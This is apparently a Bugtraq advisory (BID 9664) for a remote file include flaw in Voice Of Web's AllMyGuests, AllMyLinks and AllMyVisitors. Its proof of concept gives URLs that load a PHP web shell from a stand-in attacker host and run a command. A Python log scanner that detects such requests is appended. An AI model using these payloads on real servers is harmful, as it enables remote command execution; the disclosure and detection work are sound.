Voice Of Web AllMyPHP Remote File Include Vulnerabilities
BID:9664
Info
| Bugtraq ID: | 9664 |
| Class: | Input Validation Error |
| CVE: | CVE-2004-0285 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 16 2004 12:00AM |
| Updated: | Jul 12 2009 03:06AM |
| Credit: | Disclosure of these issues has been credited to Pablo Santana. |
| Vulnerable: | Voice Of Web AllMyVisitors 0.4, Voice Of Web AllMyVisitors 0.3, Voice Of Web AllMyLinks 0.5, Voice Of Web AllMyLinks 0.4.9, Voice Of Web AllMyLinks 0.4.4, Voice Of Web AllMyLinks 0.4.3, Voice Of Web AllMyLinks 0.4.1, Voice Of Web AllMyLinks 0.4, Voice Of Web AllMyLinks 0.3, Voice Of Web AllMyGuests 0.4.1, Voice Of Web AllMyGuests 0.4, Voice Of Web AllMyGuests 0.3, Voice Of Web AllMyGuests 0.1.2 |
| Not Vulnerable: | |
Discussion
Reportedly, the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI-supplied variables that are used in a 'require_once()' call.
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.
Exploit / POC
There is no exploit required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
http://www.example.com/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
http://www.example.com/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
In all cases 'www.example.org/attacker.php' will contain:
<?php
system("$cmd");
?>
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
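With no vendor patch available, requests that try to set the configuration array from the URI can at least be spotted in web server logs. The following is an added example, not part of the original advisory or the vendor's code: it assumes Common/Combined Log Format access logs and runs over constructed sample lines, with the parameter names taken from the proof-of-concept URLs above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names as they appear in the advisory's proof-of-concept URLs.
CONFIG_PARAM = re.compile(r"^_AM[GLV]config\[cfg_serverpath\]$")
# A URL scheme (http://, ftp://, data:, ...) or a leading // means the value
# names a remote resource rather than a local directory.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]+:|//)", re.IGNORECASE)
# Request line of a Common/Combined Log Format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Feb/2004:10:01:02 +0000] "GET /allmylinks/include/'
    'footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.example.org/'
    'attacker.php/&cmd=uname%20-a HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/Feb/2004:10:01:09 +0000] "GET /allmylinks/include/'
    'info.inc.php?_AMGconfig%5Bcfg_serverpath%5D=http%3A%2F%2Fwww.example.org'
    '%2Fattacker.php%2F HTTP/1.1" 200 498',
    '198.51.100.20 - - [16/Feb/2004:10:02:30 +0000] "GET /allmylinks/include/'
    'info.inc.php?_AMVconfig[cfg_serverpath]=/var/www/ HTTP/1.1" 200 77',
    '192.0.2.44 - - [16/Feb/2004:10:03:00 +0000] "GET /allmylinks/index.php'
    '?page=2 HTTP/1.1" 200 4312',
]


def find_config_overrides(log_lines):
    """Return (client, path, param, value, remote) per request that sets
    the config array from the URI; `remote` marks URL-like values."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        # parse_qsl percent-decodes names and values, so %5B/%5D variants
        # of the brackets are matched as well.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if CONFIG_PARAM.match(name):
                client = line.split(" ", 1)[0]
                remote = bool(REMOTE_VALUE.match(value))
                hits.append((client, target.path, name, value, remote))
    return hits


if __name__ == "__main__":
    for hit in find_config_overrides(SAMPLE_LOG):
        print(hit)
```

Every request that supplies the parameter is reported, since the server path is a configuration value that should never arrive from the URI; the `remote` flag separates URL-valued attempts from other tampering.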
References
References:
- AllMyPHP Product Page (Voice Of Web)
- AllMyGuests PHP Code Injection vulnerability (Pablo Santana)
- AllMyLinks PHP Code Injection vulnerability (Pablo Santana)
- AllMyVisitors PHP Code Injection vulnerability (Pablo Santana)